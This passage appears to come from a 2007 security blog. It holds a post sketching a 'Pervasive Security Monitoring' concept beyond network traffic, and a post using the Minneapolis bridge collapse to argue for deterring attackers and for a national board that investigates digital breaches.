After Black Hat I've been thinking of how to address gaining insight into the security state of the enterprise. My first book addressed how to detect and respond to intrusions using traffic sources in the form of network security monitoring. I've talked about gaining pervasive network awareness several times as well. Recently I've written about security application instrumentation, and several times over the years I've discussed why I am not anti-log.

I am beginning to formulate my thoughts on what I'm calling Pervasive Security Monitoring. I don't have a formal definition yet, but the concept will extend past NSM data sources (traffic) into reports on the state of platforms, OS, applications, and data. The dictionary definition, "to become spread throughout all parts of," captures the concept fairly well at this stage.

I noticed Cisco and a few others used the term pervasive security awareness, but it's used as a way to encourage employees to become security conscious. That's not what I mean. I see pervasive security monitoring as a way to achieve pervasive security awareness, in the form of collecting data to inform the decision-making process.

I considered using the term "enterprise security monitoring," but I don't think that term as previously used covers everything I have in mind. As I develop these thoughts I will discuss them here.

Tuesday, August 07, 2007

Minneapolis Bridge Lessons for Digital Security

The Minneapolis bridge collapse is a tragedy. I had two thoughts that related to security.

  1. If the bridge collapsed due to structural or design flaws, the proper response is to investigate the designers, contractors, inspectors, and maintenance personnel from a safety and negligence perspective. Based on the findings, architectural and construction changes plus new safety operations might be applied in the future. This is a technical and operational response.

  2. If the bridge collapsed due to attack, the proper response is to investigate, apprehend, prosecute, and incarcerate the criminals. Redesigning bridges to withstand bomb attacks is unlikely. This is a threat reduction and deterrence response.


Do you agree with that assessment? If yes, why do you think response 1 (try to improve the "bridge" and similar operations) is the response to every digital security attack (i.e., case 2)? My short answer: everyone blames the victim, not the criminal.

The NTSB is on scene in Minneapolis with law enforcement to figure out if the bridge collapse was caused by scenario 1 or 2. Why don't we have a National Digital Security Board investigating breaches? My short answer: it's easier to hide a massive security breach than the destruction of any bridge, building, plane, or train.